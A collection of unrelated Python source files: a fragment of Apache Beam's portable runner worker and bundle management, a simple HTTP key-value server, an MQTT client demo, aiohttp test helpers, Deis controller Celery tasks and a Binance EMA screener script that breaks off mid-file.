endpoints_pb2.ApiServiceDescriptor return endpoints_pb2.ApiServiceDescriptor( url=self.port_from_worker(self._grpc_server.logging_port)) def close(self): # type: () -> None self.control_conn.close() self.data_conn.close() super(GrpcWorkerHandler, self).close() def port_from_worker(self, port): return '%s:%s' % (self.host_from_worker(), port) def host_from_worker(self): return 'localhost' @WorkerHandler.register_environment( common_urns.environments.EXTERNAL.urn, beam_runner_api_pb2.ExternalPayload) class ExternalWorkerHandler(GrpcWorkerHandler): def __init__(self, external_payload, # type: beam_runner_api_pb2.ExternalPayload state, # type: FnApiRunner.StateServicer provision_info, # type: Optional[ExtendedProvisionInfo] grpc_server # type: GrpcServer ): # type: (...) -> None super(ExternalWorkerHandler, self).__init__(state, provision_info, grpc_server) self._external_payload = external_payload def start_worker(self): # type: () -> None stub = beam_fn_api_pb2_grpc.BeamFnExternalWorkerPoolStub( GRPCChannelFactory.insecure_channel( self._external_payload.endpoint.url)) control_descriptor = endpoints_pb2.ApiServiceDescriptor( url=self.control_address) response = stub.StartWorker( beam_fn_api_pb2.StartWorkerRequest( worker_id=self.worker_id, control_endpoint=control_descriptor, artifact_endpoint=control_descriptor, provision_endpoint=control_descriptor, logging_endpoint=self.logging_api_service_descriptor(), params=self._external_payload.params)) if response.error: raise RuntimeError("Error starting worker: %s" % response.error) def stop_worker(self): # type: () -> None pass def host_from_worker(self): # TODO(BEAM-8646): Reconcile the behavior on Windows platform. if sys.platform == 'win32': return 'localhost' import socket return socket.getfqdn() @WorkerHandler.register_environment(python_urns.EMBEDDED_PYTHON_GRPC, bytes) class EmbeddedGrpcWorkerHandler(GrpcWorkerHandler): def __init__(self, payload, # type: bytes state, # type: FnApiRunner.StateServicer provision_info, # type: Optional[ExtendedProvisionInfo] grpc_server # type: GrpcServer ): # type: (...) -> None super(EmbeddedGrpcWorkerHandler, self).__init__(state, provision_info, grpc_server) from apache_beam.transforms.environments import EmbeddedPythonGrpcEnvironment config = EmbeddedPythonGrpcEnvironment.parse_config(payload.decode('utf-8')) self._state_cache_size = config.get('state_cache_size') or STATE_CACHE_SIZE self._data_buffer_time_limit_ms = \ config.get('data_buffer_time_limit_ms') or DATA_BUFFER_TIME_LIMIT_MS def start_worker(self): # type: () -> None self.worker = sdk_worker.SdkHarness( self.control_address, state_cache_size=self._state_cache_size, data_buffer_time_limit_ms=self._data_buffer_time_limit_ms, worker_id=self.worker_id) self.worker_thread = threading.Thread( name='run_worker', target=self.worker.run) self.worker_thread.daemon = True self.worker_thread.start() def stop_worker(self): # type: () -> None self.worker_thread.join() # The subprocesses module is not threadsafe on Python 2.7. Use this lock to # prevent concurrent calls to POpen(). SUBPROCESS_LOCK = threading.Lock() @WorkerHandler.register_environment(python_urns.SUBPROCESS_SDK, bytes) class SubprocessSdkWorkerHandler(GrpcWorkerHandler): def __init__(self, worker_command_line, # type: bytes state, # type: FnApiRunner.StateServicer provision_info, # type: Optional[ExtendedProvisionInfo] grpc_server # type: GrpcServer ): # type: (...) -> None super(SubprocessSdkWorkerHandler, self).__init__(state, provision_info, grpc_server) self._worker_command_line = worker_command_line def start_worker(self): # type: () -> None from apache_beam.runners.portability import local_job_service self.worker = local_job_service.SubprocessSdkWorker( self._worker_command_line, self.control_address, self.worker_id) self.worker_thread = threading.Thread( name='run_worker', target=self.worker.run) self.worker_thread.start() def stop_worker(self): # type: () -> None self.worker_thread.join() @WorkerHandler.register_environment( common_urns.environments.DOCKER.urn, beam_runner_api_pb2.DockerPayload) class DockerSdkWorkerHandler(GrpcWorkerHandler): def __init__(self, payload, # type: beam_runner_api_pb2.DockerPayload state, # type: FnApiRunner.StateServicer provision_info, # type: Optional[ExtendedProvisionInfo] grpc_server # type: GrpcServer ): # type: (...) -> None super(DockerSdkWorkerHandler, self).__init__(state, provision_info, grpc_server) self._container_image = payload.container_image self._container_id = None # type: Optional[bytes] def host_from_worker(self): if sys.platform == "darwin": # See https://docs.docker.com/docker-for-mac/networking/ return 'host.docker.internal' else: return super(DockerSdkWorkerHandler, self).host_from_worker() def start_worker(self): # type: () -> None with SUBPROCESS_LOCK: try: subprocess.check_call(['docker', 'pull', self._container_image]) except Exception: _LOGGER.info('Unable to pull image %s' % self._container_image) self._container_id = subprocess.check_output([ 'docker', 'run', '-d', # TODO: credentials '--network=host', self._container_image, '--id=%s' % self.worker_id, '--logging_endpoint=%s' % self.logging_api_service_descriptor().url, '--control_endpoint=%s' % self.control_address, '--artifact_endpoint=%s' % self.control_address, '--provision_endpoint=%s' % self.control_address, ]).strip() assert self._container_id is not None while True: status = subprocess.check_output([ 'docker', 'inspect', '-f', '{{.State.Status}}', self._container_id ]).strip() _LOGGER.info( 'Waiting for docker to start up.Current status is %s' % status.decode('utf-8')) if status == b'running': _LOGGER.info( 'Docker container is running. container_id = %s, ' 'worker_id = %s', self._container_id, self.worker_id) break elif status in (b'dead', b'exited'): subprocess.call(['docker', 'container', 'logs', self._container_id]) raise RuntimeError( 'SDK failed to start. Final status is %s' % status.decode('utf-8')) time.sleep(1) def stop_worker(self): # type: () -> None if self._container_id: with SUBPROCESS_LOCK: subprocess.call(['docker', 'kill', self._container_id]) class WorkerHandlerManager(object): """ Manages creation of ``WorkerHandler``s. Caches ``WorkerHandler``s based on environment id. """ def __init__(self, environments, # type: Mapping[str, beam_runner_api_pb2.Environment] job_provision_info # type: Optional[ExtendedProvisionInfo] ): # type: (...) -> None self._environments = environments self._job_provision_info = job_provision_info self._cached_handlers = collections.defaultdict( list) # type: DefaultDict[str, List[WorkerHandler]] self._workers_by_id = {} # type: Dict[str, WorkerHandler] self._state = FnApiRunner.StateServicer() # rename? self._grpc_server = None # type: Optional[GrpcServer] def get_worker_handlers( self, environment_id, # type: Optional[str] num_workers # type: int ): # type: (...) -> List[WorkerHandler] if environment_id is None: # Any environment will do, pick one arbitrarily. environment_id = next(iter(self._environments.keys())) environment = self._environments[environment_id] # assume all environments except EMBEDDED_PYTHON use gRPC. if environment.urn == python_urns.EMBEDDED_PYTHON: # special case for EmbeddedWorkerHandler: there's no need for a gRPC # server, but to pass the type check on WorkerHandler.create() we # make like we have a GrpcServer instance. self._grpc_server = cast(GrpcServer, None) elif self._grpc_server is None: self._grpc_server = GrpcServer( self._state, self._job_provision_info, self) worker_handler_list = self._cached_handlers[environment_id] if len(worker_handler_list) < num_workers: for _ in range(len(worker_handler_list), num_workers): worker_handler = WorkerHandler.create( environment, self._state, self._job_provision_info, self._grpc_server) _LOGGER.info( "Created Worker handler %s for environment %s", worker_handler, environment) self._cached_handlers[environment_id].append(worker_handler) self._workers_by_id[worker_handler.worker_id] = worker_handler worker_handler.start_worker() return self._cached_handlers[environment_id][:num_workers] def close_all(self): for worker_handler_list in self._cached_handlers.values(): for worker_handler in set(worker_handler_list): try: worker_handler.close() except Exception: _LOGGER.error( "Error closing worker_handler %s" % worker_handler, exc_info=True) self._cached_handlers = {} self._workers_by_id = {} if self._grpc_server is not None: self._grpc_server.close() self._grpc_server = None def get_worker(self, worker_id): return self._workers_by_id[worker_id] class ExtendedProvisionInfo(object): def __init__(self, provision_info=None, # type: Optional[beam_provision_api_pb2.ProvisionInfo] artifact_staging_dir=None, job_name=None, # type: Optional[str] ): self.provision_info = ( provision_info or beam_provision_api_pb2.ProvisionInfo()) self.artifact_staging_dir = artifact_staging_dir self.job_name = job_name _split_managers = [] @contextlib.contextmanager def split_manager(stage_name, split_manager): """Registers a split manager to control the flow of elements to a given stage. Used for testing. A split manager should be a coroutine yielding desired split fractions, receiving the corresponding split results. Currently, only one input is supported. """ try: _split_managers.append((stage_name, split_manager)) yield finally: _split_managers.pop() class BundleManager(object): """Manages the execution of a bundle from the runner-side. This class receives a bundle descriptor, and performs the following tasks: - Registration of the bundle with the worker. - Splitting of the bundle - Setting up any other bundle requirements (e.g. side inputs). - Submitting the bundle to worker for execution - Passing bundle input data to the worker - Collecting bundle output data from the worker - Finalizing the bundle. """ _uid_counter = 0 _lock = threading.Lock() def __init__(self, worker_handler_list, # type: Sequence[WorkerHandler] get_buffer, # type: Callable[[bytes, str], PartitionableBuffer] get_input_coder_impl, # type: Callable[[str], CoderImpl] bundle_descriptor, # type: beam_fn_api_pb2.ProcessBundleDescriptor progress_frequency=None, skip_registration=False, cache_token_generator=FnApiRunner.get_cache_token_generator() ): """Set up a bundle manager. Args: worker_handler_list get_buffer (Callable[[str], list]) get_input_coder_impl (Callable[[str], Coder]) bundle_descriptor (beam_fn_api_pb2.ProcessBundleDescriptor) progress_frequency skip_registration """ self._worker_handler_list = worker_handler_list self._get_buffer = get_buffer self._get_input_coder_impl = get_input_coder_impl self._bundle_descriptor = bundle_descriptor self._registered = skip_registration self._progress_frequency = progress_frequency self._worker_handler = None # type: Optional[WorkerHandler] self._cache_token_generator = cache_token_generator def _send_input_to_worker(self, process_bundle_id, # type: str read_transform_id, # type: str byte_streams ): # type: (...) -> None assert self._worker_handler is not None data_out = self._worker_handler.data_conn.output_stream( process_bundle_id, read_transform_id) for byte_stream in byte_streams: data_out.write(byte_stream) data_out.close() def _register_bundle_descriptor(self): # type: () -> Optional[ControlFuture] if self._registered: registration_future = None else: assert self._worker_handler is not None process_bundle_registration = beam_fn_api_pb2.InstructionRequest( register=beam_fn_api_pb2.RegisterRequest( process_bundle_descriptor=[self._bundle_descriptor])) registration_future = self._worker_handler.control_conn.push( process_bundle_registration) self._registered = True return registration_future def _select_split_manager(self): """TODO(pabloem) WHAT DOES THIS DO""" unique_names = set( t.unique_name for t in self._bundle_descriptor.transforms.values()) for stage_name, candidate in reversed(_split_managers): if (stage_name in unique_names or (stage_name + '/Process') in unique_names): split_manager = candidate break else: split_manager = None return split_manager def _generate_splits_for_testing(self, split_manager, inputs, # type: Mapping[str, PartitionableBuffer] process_bundle_id): # type: (...) -> List[beam_fn_api_pb2.ProcessBundleSplitResponse] split_results = [] # type: List[beam_fn_api_pb2.ProcessBundleSplitResponse] read_transform_id, buffer_data = only_element(inputs.items()) byte_stream = b''.join(buffer_data) num_elements = len( list( self._get_input_coder_impl(read_transform_id).decode_all( byte_stream))) # Start the split manager in case it wants to set any breakpoints. split_manager_generator = split_manager(num_elements) try: split_fraction = next(split_manager_generator) done = False except StopIteration: done = True # Send all the data. self._send_input_to_worker( process_bundle_id, read_transform_id, [byte_stream]) assert self._worker_handler is not None # Execute the requested splits. while not done: if split_fraction is None: split_result = None else: split_request = beam_fn_api_pb2.InstructionRequest( process_bundle_split=beam_fn_api_pb2.ProcessBundleSplitRequest( instruction_id=process_bundle_id, desired_splits={ read_transform_id: beam_fn_api_pb2. ProcessBundleSplitRequest.DesiredSplit( fraction_of_remainder=split_fraction, estimated_input_elements=num_elements) })) split_response = self._worker_handler.control_conn.push( split_request).get() # type: beam_fn_api_pb2.InstructionResponse for t in (0.05, 0.1, 0.2): waiting = ('Instruction not running', 'not yet scheduled') if any(msg in split_response.error for msg in waiting): time.sleep(t) split_response = self._worker_handler.control_conn.push( split_request).get() if 'Unknown process bundle' in split_response.error: # It may have finished too fast. split_result = None elif split_response.error: raise RuntimeError(split_response.error) else: split_result = split_response.process_bundle_split split_results.append(split_result) try: split_fraction = split_manager_generator.send(split_result) except StopIteration: break return split_results def process_bundle(self, inputs, # type: Mapping[str, PartitionableBuffer] expected_outputs # type: DataOutput ): # type: (...) -> BundleProcessResult # Unique id for the instruction processing this bundle. with BundleManager._lock: BundleManager._uid_counter += 1 process_bundle_id = 'bundle_%s' % BundleManager._uid_counter self._worker_handler = self._worker_handler_list[ BundleManager._uid_counter % len(self._worker_handler_list)] # Register the bundle descriptor, if needed - noop if already registered. registration_future = self._register_bundle_descriptor() # Check that the bundle was successfully registered. if registration_future and registration_future.get().error: raise RuntimeError(registration_future.get().error) split_manager = self._select_split_manager() if not split_manager: # If there is no split_manager, write all input data to the channel. for transform_id, elements in inputs.items(): self._send_input_to_worker(process_bundle_id, transform_id, elements) # Actually start the bundle. process_bundle_req = beam_fn_api_pb2.InstructionRequest( instruction_id=process_bundle_id, process_bundle=beam_fn_api_pb2.ProcessBundleRequest( process_bundle_descriptor_id=self._bundle_descriptor.id, cache_tokens=[next(self._cache_token_generator)])) result_future = self._worker_handler.control_conn.push(process_bundle_req) split_results = [] # type: List[beam_fn_api_pb2.ProcessBundleSplitResponse] with ProgressRequester(self._worker_handler, process_bundle_id, self._progress_frequency): if split_manager: split_results = self._generate_splits_for_testing( split_manager, inputs, process_bundle_id) # Gather all output data. for output in self._worker_handler.data_conn.input_elements( process_bundle_id, expected_outputs.keys(), abort_callback=lambda: (result_future.is_done() and result_future.get().error)): if output.transform_id in expected_outputs: with BundleManager._lock: self._get_buffer( expected_outputs[output.transform_id], output.transform_id).append(output.data) _LOGGER.debug('Wait for the bundle %s to finish.' % process_bundle_id) result = result_future.get() # type: beam_fn_api_pb2.InstructionResponse if result.error: raise RuntimeError(result.error) if result.process_bundle.requires_finalization: finalize_request = beam_fn_api_pb2.InstructionRequest( finalize_bundle=beam_fn_api_pb2.FinalizeBundleRequest( instruction_id=process_bundle_id)) self._worker_handler.control_conn.push(finalize_request) return result, split_results class ParallelBundleManager(BundleManager): def __init__( self, worker_handler_list, # type: Sequence[WorkerHandler] get_buffer, # type: Callable[[bytes, str], PartitionableBuffer] get_input_coder_impl, # type: Callable[[str], CoderImpl] bundle_descriptor, # type: beam_fn_api_pb2.ProcessBundleDescriptor progress_frequency=None, skip_registration=False, cache_token_generator=None, **kwargs): # type: (...) -> None super(ParallelBundleManager, self).__init__( worker_handler_list, get_buffer, get_input_coder_impl, bundle_descriptor, progress_frequency, skip_registration, cache_token_generator=cache_token_generator) self._num_workers = kwargs.pop('num_workers', 1) def process_bundle(self, inputs, # type: Mapping[str, PartitionableBuffer] expected_outputs # type: DataOutput ): # type: (...) -> BundleProcessResult part_inputs = [{} for _ in range(self._num_workers) ] # type: List[Dict[str, List[bytes]]] for name, input in inputs.items(): for ix, part in enumerate(input.partition(self._num_workers)): part_inputs[ix][name] = part merged_result = None # type: Optional[beam_fn_api_pb2.InstructionResponse] split_result_list = [ ] # type: List[beam_fn_api_pb2.ProcessBundleSplitResponse] def execute(part_map): # type: (...) -> BundleProcessResult bundle_manager = BundleManager( self._worker_handler_list, self._get_buffer, self._get_input_coder_impl, self._bundle_descriptor, self._progress_frequency, self._registered, cache_token_generator=self._cache_token_generator) return bundle_manager.process_bundle(part_map, expected_outputs) with UnboundedThreadPoolExecutor() as executor: for result, split_result in executor.map(execute, part_inputs): split_result_list += split_result if merged_result is None: merged_result = result else: merged_result = beam_fn_api_pb2.InstructionResponse( process_bundle=beam_fn_api_pb2.ProcessBundleResponse( monitoring_infos=monitoring_infos.consolidate( itertools.chain( result.process_bundle.monitoring_infos, merged_result.process_bundle.monitoring_infos))), error=result.error or merged_result.error) assert merged_result is not None return merged_result, split_result_list class ProgressRequester(threading.Thread): """ Thread that asks SDK Worker for progress reports with a certain frequency. A callback can be passed to call with progress updates. """ def __init__(self, worker_handler, # type: WorkerHandler instruction_id, frequency, callback=None ): # type: (...) -> None super(ProgressRequester, self).__init__() self._worker_handler = worker_handler self._instruction_id = instruction_id self._frequency = frequency self._done = False self._latest_progress = None self._callback = callback self.daemon = True def __enter__(self): if self._frequency: self.start() def __exit__(self, *unused_exc_info): if self._frequency: self.stop() def run(self): while not self._done: try: progress_result = self._worker_handler.control_conn.push( beam_fn_api_pb2.InstructionRequest( process_bundle_progress=beam_fn_api_pb2. ProcessBundleProgressRequest( instruction_id=self._instruction_id))).get() self._latest_progress = progress_result.process_bundle_progress if self._callback: self._callback(self._latest_progress) except Exception as exn: _LOGGER.error("Bad progress: %s", exn) time.sleep(self._frequency) def stop(self): self._done = True class ControlFuture(object): def __init__(self, instruction_id, response=None): self.instruction_id = instruction_id if response: self._response = response else: self._response = None self._condition = threading.Condition() def is_done(self): return self._response is not None def set(self, response): with self._condition: self._response = response self._condition.notify_all() def get(self, timeout=None): if not self._response: with self._condition: if not self._response: self._condition.wait(timeout) return self._response class FnApiMetrics(metric.MetricResults): def __init__(self, step_monitoring_infos, user_metrics_only=True): """Used for querying metrics from the PipelineResult object. step_monitoring_infos: Per step metrics specified as MonitoringInfos. user_metrics_only: If true, includes user metrics only. """ self._counters = {} self._distributions = {} self._gauges = {} self._user_metrics_only = user_metrics_only self._monitoring_infos = step_monitoring_infos for smi in step_monitoring_infos.values(): counters, distributions, gauges = \ portable_metrics.from_monitoring_infos(smi, user_metrics_only) self._counters.update(counters) self._distributions.update(distributions) self._gauges.update(gauges) def query(self, filter=None): counters = [ MetricResult(k, v, v) for k, v in self._counters.items() if self.matches(filter, k) ] distributions = [ MetricResult(k, v, v) for k, v in self._distributions.items() if self.matches(filter, k) ] gauges = [ MetricResult(k, v, v) for k, v in self._gauges.items() if self.matches(filter, k) ] return { self.COUNTERS: counters, self.DISTRIBUTIONS: distributions, self.GAUGES: gauges } def monitoring_infos(self): # type: () -> List[metrics_pb2.MonitoringInfo] return [ item for sublist in self._monitoring_infos.values() for item in sublist ] class RunnerResult(runner.PipelineResult): def __init__(self, state, monitoring_infos_by_stage, metrics_by_stage): super(RunnerResult, self).__init__(state) self._monitoring_infos_by_stage = monitoring_infos_by_stage self._metrics_by_stage = metrics_by_stage self._metrics = None self._monitoring_metrics = None def wait_until_finish(self, duration=None): return self._state def metrics(self): """Returns a queryable object including user metrics only.""" if self._metrics is None: self._metrics = FnApiMetrics( self._monitoring_infos_by_stage, user_metrics_only=True) return self._metrics def monitoring_metrics(self): """Returns a queryable object including all metrics.""" if self._monitoring_metrics is None: self._monitoring_metrics = FnApiMetrics( self._monitoring_infos_by_stage, user_metrics_only=False) return self._monitoring_metrics
kv_server.py
# Copyright 2022 kuizhiqing # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from http.server import HTTPServer import http.server as SimpleHTTPServer from multiprocessing import Process import threading import json class KVHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): def do_GET(self): with self.server.kv_lock: ret = {} for k, v in self.server.kv.items(): if k.startswith(self.path): ret[k] = v.decode(encoding="utf-8") if ret: self.output(200, json.dumps(ret).encode("utf-8")) else: self.output(404) def do_PUT(self): self.do_POST() def do_POST(self): content_length = int(self.headers['Content-Length'] or 0) try: value = self.rfile.read(content_length) with self.server.kv_lock: self.server.kv[self.path] = value self.output(200) return except: self.output(500) def do_DELETE(self): with self.server.kv_lock: if self.path in self.server.kv: del self.server.kv[self.path] self.output(200) else: self.output(404) def output(self, code, value=''): self.send_response(code) self.send_header("Content-Length", len(value)) self.send_header("Content-Type", "application/json; charset=utf8") self.end_headers() if value: self.wfile.write(value) def log_message(self, format, *args): return class KVServer(HTTPServer, object): def __init__(self, port): super(KVServer, self).__init__(('', port), KVHandler) self.kv_lock = threading.Lock() self.kv = {'/healthy': b'ok'} self.port = port self.stopped = False self.started = False def start(self): self.listen_thread = threading.Thread(target=self.serve_forever) self.listen_thread.start() self.started = True def stop(self): self.shutdown() self.listen_thread.join() self.server_close() self.stopped = True class PKVServer(): def __init__(self, port): self._server = KVServer(port) def start(self): self.proc = Process(target=self._server.start) self.proc.daemon = True self.proc.start() def stop(self): self._server.stop() self.proc.join() @property def started(self): return self._server.started @property def stopped(self): return self._server.stopped if __name__ == '__main__': #kv = PKVServer(8090) kv = KVServer(8090) kv.start() import time #print("serve at 8090 for 600 s") time.sleep(600)
mqtt.py
# coding=utf-8 ''' 连接MQTT服务器的Python代码,在EasyIoT、SIoT上测试成功,实现消息发送和订阅。 代码编写:姜浩、谢作如,2019.5.7 ''' import threading import paho.mqtt.client as mqtt import time SERVER = "127.0.0.1" #MQTT服务器IP CLIENT_ID = " " #在SIoT上,CLIENT_ID可以留空 TOPIC = 'DFRobot/linmy' #“topic”为“项目名称/设备名称” username='siot' #用户名 password='dfrobot' #密码 class MqttClient: client = mqtt.Client(CLIENT_ID) def __init__(self, host, port): self._host = host self._port = port self.client.on_connect = self._on_connect self.client.on_message = self._on_message def connect(self, username, password): self.client.username_pw_set(username, password) self.client.connect(self._host, self._port, 60) def publish(self, topic, data): self.client.publish(str(topic), str(data)) def loop(self, timeout=None): thread = threading.Thread(target=self._loop, args=(timeout,)) # thread.setDaemon(True) thread.start() def _loop(self, timeout=None): if not timeout: self.client.loop_forever() else: self.client.loop(timeout) def _on_connect(self, client, userdata, flags, rc): print("\nConnected with result code " + str(rc)) client.subscribe(TOPIC) def _on_message(self, client, userdata, msg): print("\n收到Topic:" + str(msg.topic) + " Message:" + str(msg.payload)) if __name__ == '__main__': tick = 0 # 要发送的数字 client = MqttClient(SERVER, 1883) client.connect(username,password) client.publish(TOPIC, 'hello') client.loop() while True: client.publish(TOPIC,"value %d"%tick) time.sleep(5) #隔5秒发送一次 tick = tick+1
test_utils.py
"""Utilities shared by tests.""" import cgi import contextlib import gc import email.parser import http.server import json import logging import io import os import re import ssl import sys import threading import traceback import urllib.parse import asyncio import aiohttp from aiohttp import server from aiohttp import helpers def run_briefly(loop): @asyncio.coroutine def once(): pass t = asyncio.Task(once(), loop=loop) loop.run_until_complete(t) @contextlib.contextmanager def run_server(loop, *, listen_addr=('127.0.0.1', 0), use_ssl=False, router=None): properties = {} transports = [] class HttpRequestHandler: def __init__(self, addr): if isinstance(addr, tuple): host, port = addr self.host = host self.port = port else: self.host = host = 'localhost' self.port = port = 0 self.address = addr self._url = '{}://{}:{}'.format( 'https' if use_ssl else 'http', host, port) def __getitem__(self, key): return properties[key] def __setitem__(self, key, value): properties[key] = value def url(self, *suffix): return urllib.parse.urljoin( self._url, '/'.join(str(s) for s in suffix)) class TestHttpServer(server.ServerHttpProtocol): def connection_made(self, transport): transports.append(transport) super().connection_made(transport) def handle_request(self, message, payload): if properties.get('close', False): return if properties.get('noresponse', False): yield from asyncio.sleep(99999) for hdr, val in message.headers.items(getall=True): if (hdr == 'EXPECT') and (val == '100-continue'): self.transport.write(b'HTTP/1.0 100 Continue\r\n\r\n') break if router is not None: body = yield from payload.read() rob = router( self, properties, self.transport, message, body) rob.dispatch() else: response = aiohttp.Response(self.writer, 200, message.version) text = b'Test message' response.add_header('Content-type', 'text/plain') response.add_header('Content-length', str(len(text))) response.send_headers() response.write(text) response.write_eof() if use_ssl: here = os.path.join(os.path.dirname(__file__), '..', 'tests') keyfile = os.path.join(here, 'sample.key') certfile = os.path.join(here, 'sample.crt') sslcontext = ssl.SSLContext(ssl.PROTOCOL_SSLv23) sslcontext.load_cert_chain(certfile, keyfile) else: sslcontext = None def run(loop, fut): thread_loop = asyncio.new_event_loop() asyncio.set_event_loop(thread_loop) if isinstance(listen_addr, tuple): host, port = listen_addr server_coroutine = thread_loop.create_server( lambda: TestHttpServer(keep_alive=0.5), host, port, ssl=sslcontext) else: try: os.unlink(listen_addr) except FileNotFoundError: pass server_coroutine = thread_loop.create_unix_server( lambda: TestHttpServer(keep_alive=0.5), listen_addr, ssl=sslcontext) server = thread_loop.run_until_complete(server_coroutine) waiter = asyncio.Future(loop=thread_loop) loop.call_soon_threadsafe( fut.set_result, (thread_loop, waiter, server.sockets[0].getsockname())) try: thread_loop.run_until_complete(waiter) finally: # call pending connection_made if present run_briefly(thread_loop) # close opened transports for tr in transports: tr.close() run_briefly(thread_loop) # call close callbacks server.close() thread_loop.stop() thread_loop.close() gc.collect() fut = asyncio.Future(loop=loop) server_thread = threading.Thread(target=run, args=(loop, fut)) server_thread.start() thread_loop, waiter, addr = loop.run_until_complete(fut) try: yield HttpRequestHandler(addr) finally: thread_loop.call_soon_threadsafe(waiter.set_result, None) server_thread.join() class Router: _response_version = "1.1" _responses = http.server.BaseHTTPRequestHandler.responses def __init__(self, srv, props, transport, message, payload): # headers self._headers = http.client.HTTPMessage() for hdr, val in message.headers.items(getall=True): self._headers.add_header(hdr, val) self._srv = srv self._props = props self._transport = transport self._method = message.method self._uri = message.path self._version = message.version self._compression = message.compression self._body = payload url = urllib.parse.urlsplit(self._uri) self._path = url.path self._query = url.query @staticmethod def define(rmatch): def wrapper(fn): f_locals = sys._getframe(1).f_locals mapping = f_locals.setdefault('_mapping', []) mapping.append((re.compile(rmatch), fn.__name__)) return fn return wrapper def dispatch(self): # pragma: no cover for route, fn in self._mapping: match = route.match(self._path) if match is not None: try: return getattr(self, fn)(match) except Exception: out = io.StringIO() traceback.print_exc(file=out) self._response(500, out.getvalue()) return return self._response(self._start_response(404)) def _start_response(self, code): return aiohttp.Response(self._srv.writer, code) def _response(self, response, body=None, headers=None, chunked=False, write_body=None): r_headers = {} for key, val in self._headers.items(): key = '-'.join(p.capitalize() for p in key.split('-')) r_headers[key] = val encoding = self._headers.get('content-encoding', '').lower() if 'gzip' in encoding: # pragma: no cover cmod = 'gzip' elif 'deflate' in encoding: cmod = 'deflate' else: cmod = '' resp = { 'method': self._method, 'version': '%s.%s' % self._version, 'path': self._uri, 'headers': r_headers, 'origin': self._transport.get_extra_info('addr', ' ')[0], 'query': self._query, 'form': {}, 'compression': cmod, 'multipart-data': [] } if body: # pragma: no cover resp['content'] = body else: resp['content'] = self._body.decode('utf-8', 'ignore') ct = self._headers.get('content-type', '').lower() # application/x-www-form-urlencoded if ct == 'application/x-www-form-urlencoded': resp['form'] = urllib.parse.parse_qs(self._body.decode('latin1')) # multipart/form-data elif ct.startswith('multipart/form-data'): # pragma: no cover out = io.BytesIO() for key, val in self._headers.items(): out.write(bytes('{}: {}\r\n'.format(key, val), 'latin1')) out.write(b'\r\n') out.write(self._body) out.write(b'\r\n') out.seek(0) message = email.parser.BytesParser().parse(out) if message.is_multipart(): for msg in message.get_payload(): if msg.is_multipart(): logging.warning('multipart msg is not expected') else: key, params = cgi.parse_header( msg.get('content-disposition', '')) params['data'] = msg.get_payload() params['content-type'] = msg.get_content_type() cte = msg.get('content-transfer-encoding') if cte is not None: resp['content-transfer-encoding'] = cte resp['multipart-data'].append(params) body = json.dumps(resp, indent=4, sort_keys=True) # default headers hdrs = [('Connection', 'close'), ('Content-Type', 'application/json')] if chunked: hdrs.append(('Transfer-Encoding', 'chunked')) else: hdrs.append(('Content-Length', str(len(body)))) # extra headers if headers: hdrs.extend(headers.items()) if chunked: response.force_chunked() # headers response.add_headers(*hdrs) response.send_headers() # write payload if write_body: try: write_body(response, body) except: return else: response.write(helpers.str_to_bytes(body)) response.write_eof() # keep-alive if response.keep_alive(): self._srv.keep_alive(True)
tasks.py
""" Long-running tasks for the Deis Controller API This module orchestrates the real "heavy lifting" of Deis, and as such these functions are decorated to run as asynchronous celery tasks. """ from __future__ import unicode_literals import requests import threading from celery import task from django.conf import settings @task def create_cluster(cluster): cluster._scheduler.setUp() @task def destroy_cluster(cluster): for app in cluster.app_set.all(): app.destroy() cluster._scheduler.tearDown() @task def deploy_release(app, release): containers = app.container_set.all() threads = [] for c in containers: threads.append(threading.Thread(target=c.deploy, args=(release,))) [t.start() for t in threads] [t.join() for t in threads] @task def import_repository(source, target_repository): """Imports an image from a remote registry into our own private registry""" data = { 'src': source, } requests.post( '{}/v1/repositories/{}/tags'.format(settings.REGISTRY_URL, target_repository), data=data, ) @task def start_containers(containers): create_threads = [] start_threads = [] for c in containers: create_threads.append(threading.Thread(target=c.create)) start_threads.append(threading.Thread(target=c.start)) [t.start() for t in create_threads] [t.join() for t in create_threads] [t.start() for t in start_threads] [t.join() for t in start_threads] @task def stop_containers(containers): destroy_threads = [] delete_threads = [] for c in containers: destroy_threads.append(threading.Thread(target=c.destroy)) delete_threads.append(threading.Thread(target=c.delete)) [t.start() for t in destroy_threads] [t.join() for t in destroy_threads] [t.start() for t in delete_threads] [t.join() for t in delete_threads] @task def run_command(c, command): release = c.release version = release.version image = '{}:{}/{}'.format(settings.REGISTRY_HOST, settings.REGISTRY_PORT, release.image) try: # pull the image first rc, pull_output = c.run("docker pull {image}".format(**locals())) if rc != 0: raise EnvironmentError('Could not pull image: {image}'.format(**locals())) # run the command docker_args = ' '.join(['--entrypoint=/bin/sh', '-a', 'stdout', '-a', 'stderr', '--rm', image]) escaped_command = command.replace("'", "'\\''") command = r"docker run {docker_args} -c \'{escaped_command}\'".format(**locals()) return c.run(command) finally: c.delete()
binance_pairs_ema.py
import requests import json import os import time from threading import Thread from bfxhfindicators import EMA BASE_URL = 'https://api.binance.com' TIMEFRAME = '4h' EMA_PERIODS = [50, 200] symbols = [] candles = {} prices = {} ema_values = {} def load_candles(sym): global candles, prices, BASE_URL payload = { 'symbol': sym, 'interval': '4h', 'limit': 250 } resp = requests.get(BASE_URL + '/api/v1/klines', params=payload) klines = json.loads(resp.content) # parse klines and store open, high, low, close and vol only parsed_klines = [] for k in klines: k_candle = { 'open': float(k[1]), 'high': float(k[2]), 'low': float(k[3]), 'close': float(k[4]), 'vol': float(k[5]) } parsed_klines.append(k_candle) candles[sym] = parsed_klines index = len(parsed_klines) - 1 # get index of latest candle prices[sym] = parsed_klines[index]['close'] # save current price # create results folder if it doesn't exist if not os.path.exists('results/'): os.makedirs('results/') # start with blank files open('results/below_50.txt', 'w').close() open('results/above_50_below_200.txt', 'w').close() open('results/above_200.txt', 'w').close() # load symbols information print('Getting list of BTC trade pairs...') resp = requests.get(BASE_URL + '/api/v1/ticker/allBookTickers') tickers_list = json.loads(resp.content) for ticker in tickers_list: if str(ticker['symbol'])[-4:] == 'USDT': symbols.append(ticker['symbol']) # get 4h candles for symbols print('Loading candle data for symbols...') for sym in symbols: Thread(target=load_candles, args=(sym,)).start() while len(candles) < len(symbols): print('%s/%s loaded' %(len(candles), len(symbols)), end='\r', flush=True) time.sleep(0.1) # 